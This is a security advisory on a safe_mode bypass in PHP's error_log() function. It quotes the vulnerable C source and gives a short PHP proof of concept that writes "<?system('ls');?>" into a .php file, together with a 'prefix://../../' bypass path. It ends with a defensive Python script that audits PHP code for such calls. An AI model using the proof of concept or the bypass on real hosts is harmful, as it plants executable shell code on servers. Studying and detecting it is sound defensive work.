A recently disclosed security vulnerability
Affected systems:
PHP PHP 5.1.4
PHP PHP 4.4.2
PHP's error_log() function contains a safe mode restriction bypass vulnerability:
PHP5:
- -2013-2050---
PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
{
	php_stream *stream = NULL;

	switch (opt_err) {
		case 1:		/* send an email */
			{
#if HAVE_SENDMAIL
				if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
					return FAILURE;
				}
#else
				php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
				return FAILURE;
#endif
			}
			break;

		case 2:		/* send to an address */
			php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
			return FAILURE;
			break;

		case 3:		/* save to a file; opt is the destination passed to error_log() */
			stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
			if (!stream)
				return FAILURE;
			php_stream_write(stream, message, strlen(message));
			php_stream_close(stream);
			break;

		default:
			php_log_err(message TSRMLS_CC);
			break;
	}
	return SUCCESS;
}
- -2013-2050---
In option 3:
- -2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
- -2038 line---
The vulnerability lies in php_stream_open_wrapper(). If the user supplies "prefix://../../", IGNORE_URL turns off safe_mode.
Test:
<?php
if (!isset($username)) {
	error_log("<?system('ls');?>",3 ,"./errorlog.php");
}
?>
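On a shared host, the call pattern described above can be searched for in tenant code. The audit script below is an added example, not part of the original post or of PHP itself; the rule names, the sample lines and the /var/log/app path are assumptions made for illustration.

```python
import re

CALL = re.compile(r"\berror_log\s*\(", re.I)
LITERAL = re.compile(r"""^(["'])(?:\\.|(?!\1).)*\1$""", re.S)   # one quoted string
def split_args(src, i):
    """Split call arguments starting just after '(' at index i (None if unterminated)."""
    args, cur, depth, quote = [], [], 0, None
    while i < len(src):
        ch = src[i]
        if quote:
            if ch == "\\":
                ch, i = src[i:i + 2], i + 1      # keep backslash + escaped char
            elif ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
        elif ch in "([{":
            depth += 1
        elif ch in ")]}":
            if depth == 0:                       # the ')' closing error_log(
                return args + ["".join(cur).strip()]
            depth -= 1
        elif ch == "," and depth == 0:           # top-level comma: next argument
            args.append("".join(cur).strip())
            cur, ch = [], ""
        cur.append(ch)
        i += 1
    return None

def audit(php_source):
    """Return (line, reason, destination) for risky error_log(msg, 3, dest)."""
    findings = []
    for m in CALL.finditer(php_source):
        args = split_args(php_source, m.end())
        if args and len(args) >= 3 and args[1] == "3":   # 3 = append to file
            dest, line = args[2], php_source.count("\n", 0, m.start()) + 1
            reason = ("wrapper-prefix" if "://" in dest else
                      "dynamic-destination" if not LITERAL.match(dest) else
                      "script-extension" if re.search(r"\.(php\d?|phtml).$", dest, re.I)
                      else None)
            if reason:
                findings.append((line, reason, dest))
    return findings

# Constructed sample; line 3 is the test call quoted in the post.
SAMPLE = r'''<?php
error_log("login failed, user=" . $u, 3, "/var/log/app/auth.log");
error_log("<?system('ls');?>",3 ,"./errorlog.php");
error_log($msg, 3, "prefix://../../" . $name);'''
```

`audit()` only flags candidates for review: a dynamic destination is not a bypass by itself, and a match on `://` should be checked against the PHP version running on the host.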